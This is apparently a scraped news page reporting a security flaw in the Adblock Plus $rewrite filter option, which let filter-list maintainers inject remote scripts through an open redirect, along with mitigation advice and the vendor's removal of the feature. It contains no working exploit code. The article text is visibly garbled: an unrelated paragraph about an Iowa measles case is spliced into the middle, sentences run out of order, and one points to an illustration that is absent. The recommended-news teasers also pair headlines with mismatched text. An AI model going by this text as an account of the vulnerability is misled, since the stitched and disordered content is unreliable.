Adblock Security Flaw Can Let Hackers Execute Malicious Code in Browsers

Adblock Security Flaw Can Let Hackers Execute Malicious Code in Browsers

Adblock Security Flaw Can Let Hackers Execute Malicious Code in Browsers

An exploit has been discovered that could allow ad blocking filter list maintainers for the Adblock Plus, AdBlock, and uBlocker browser extensions to create filters that inject remote scripts into web sites. The rationale for doing so is that there may be times when it's better to redirect a web request rather than blocking it. With this directive, third-party maintained filter lists can selectively rewrite URL parameters.

To make $rewrite even more hard to exploit, this filter option will not work against requests of the type SCRIPT, SUBDOCUMENT, OBJECT and OBJECT_SUBREQUEST.

Raymond Hill, the creator of rival content blocking extension uBlock Origin, previous year said he would not be implementing $rewrite because of security concerns. What has made $rewrite exploitable?

Under certain conditions, it appears that arbitrary code can be injected when domains load JS strings using XMLHttpRequest or when they use Fetch to download code snippets for execution.

A feature introduced previous year in Adblock Plus and a few other related content blocking browser extensions allows providers of filtering lists, under certain conditions, to execute arbitrary code on web pages. This was not too hard to find, as Sebastian utilized Google Maps for his Proof of Concept.

The two keys to the puzzle is the use of XMLHttpRequest or Fetch to download scripts and an open redirect.

The $rewrite filter provides a way to remove tracking data from URLs.

Most content blockers use and load filter lists that include instructions to block or change certain content on visited sites in the web browser by default; this is done to ensure that default configurations do block a good chunk of unwanted content right away.

Iowa Sees First Case of Measles Since 2011
The individual was not vaccinated and had recently returned from Israel, where transmission of the illness is occurring. The Iowa Department of Public Health clarified that there is no indication of a threat to the public at this time.

As the open redirect url is in the same origin, or domain, the strings will be allowed to be read and executed as JavaScript, which will cause the alert to be shown as seen below.

"The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are hard to detect and are deployable in all major browsers".

He has contacted Google regarding the vulnerability, but was told by the company that the flaw was "intended behavior" when it comes to its services - in other words, this is an issue for the makers of the ad blockers to sort out, and nothing to do with Google.

The issue was reported but Google says the open redirect used by Google Maps is "intended behavior" and the potential security problem lies only within the mentioned browser extensions.

In order to mitigate this chained exploit, Sebastian recommends that web sites utilize the Content Security Policy header and the connect-src option to specify a whitelist of sites that scripts can be loaded from. Sebastian suggests that ad blockers should drop the support for $rewrite feature and opt for those options that don't support it in the first place.

Why would a filter maintainer go rogue?

He added these attacks are said to be "difficult to detect and are deployable in all major browsers". "This method allows delivering payloads on a per request basis, you may be targeted, exploited and the evidence cleared from the extension storage, without needing to publish the payload as part of a public filter list", he said.

"It is our responsibility to protect our users, and despite the actual risk being very low, we have chose to remove the rewrite option and will accordingly release an updated version of Adblock Plus as soon as technically possible.We are doing this as a measure of precaution".

The company, which posted a longer statement on its website, said it considers exploitation unlikely (and hasn't seen any exploitation attempts) because it vets authors who contribute to filter lists enabled in Adblock Plus by default and it examines filter lists regularly.

Recommended News

  • Brighton & Hove Albion vs. Cardiff City - Football Match Report

    Brighton & Hove Albion vs. Cardiff City - Football Match Report

    Nathaniel Mendez-Laing fired Cardiff ahead in the 22nd minute, adding the finishing touch to a swift counter-attack. Neil Warnock's side would have been pushed to the brink of relegation with a defeat at the Amex Stadium .
    Amul’s cartoon on Notre Dame fire is dedicated to France’s resilience

    Amul’s cartoon on Notre Dame fire is dedicated to France’s resilience

    Most of the wooden roof beams have been burned, and parts of the concrete vaulting holding up the roof have collapsed. Officials have warned that Notre Dame may still have gravely unsafe vulnerabilities, especially in the soaring vault.
    Toyota unveils electric SUVs at Shanghai motor show

    Toyota unveils electric SUVs at Shanghai motor show

    State-owned power companies have blanketed China with 730,000 charging stations, a vastly larger network than any other country. At the same time, industry revenue was squeezed by a 4.1 percent fall in total Chinese auto sales to 23.7 million vehicles.
  • France announces competition to rebuild Notre Dame's spire

    France announces competition to rebuild Notre Dame's spire

    While an investigation is still ongoing, French authorities have said that they believe the fire was accidental. The video game is called Assassin's Creed Unity and it was created by Paris-based Ubisoft.
    Dust storm, lightning and rain kill at least 47 in India

    Dust storm, lightning and rain kill at least 47 in India

    Several districts in Gujarat like Ahmedabad, Rajkot, Banaskantha, Patan, Mehsana, Sabarkantha and Anand were severely affected. Unseasonal rain and thundershower resulted in the deaths of at least 32 people across three states in the last 48 hours.
    Microsoft announces slimmer and lighter Surface Hub 2S

    Microsoft announces slimmer and lighter Surface Hub 2S

    Wednesday, the company announced that it will be available in June for $8,999, and we got a chance to see and interact with it. On April 17, officials teed up the new Surface Hub 2S devices by revealing the pricing, SKUs, specs, and availability dates.
  • Canada expands sanctions, adds 43 people close to Venezuela’s Maduro

    Canada expands sanctions, adds 43 people close to Venezuela’s Maduro

    That's not in the best interests of the South American people, and the United States stands ready. Calling such actions "disgraceful", Lu stressed that lies will always be lies and that "Mr.
    Malinga won't captain Sri Lanka at World Cup

    Malinga won't captain Sri Lanka at World Cup

    But Mathews is said to have declined the offer to captain citing his disagreements with coach Chandika Hathurusinghe. Karunaratne, a Test opener, forced himself into the ODI captaincy following his success in the Test arena.
    Razer's Core X Chroma eGPU Gets a Threefold Boost

    Razer's Core X Chroma eGPU Gets a Threefold Boost

    Oddly enough, the Core X was missing the signature Chroma LED lights that even the smaller Core V2 had by default. And of course, there's the cost of the graphics card to go inside on top of that.
  • Assassin's Creed Odyssey Fate of Atlantis Episode One Launches Next Week

    The Fate of Atlantis will also introduce new Ability enhancements, letting you modify your existing abilities for a more customized playstyle.

    Nintendo Switch Update 8.0.0 Patch Notes

    A View All Available News option is available within News, allowing you to view all news items now being distributed. Users can also sort their software by last played, total time played, the software title, and software developer.
    Firefighter 'seriously injured' battling Notre Dame blaze

    Firefighter 'seriously injured' battling Notre Dame blaze

    Rioting Huguenots, or French Protestants, vandalised parts of the building they believed to be idolatrous in the mid-16th century. The fire collapsed the cathedral's spire and spread to one of its landmark rectangular towers. "We will rebuild it together".

We are pleased to provide this opportunity to share information, experiences and observations about what's in the news.
Some of the comments may be reprinted elsewhere in the site or in the newspaper.
Thank you for taking the time to offer your thoughts.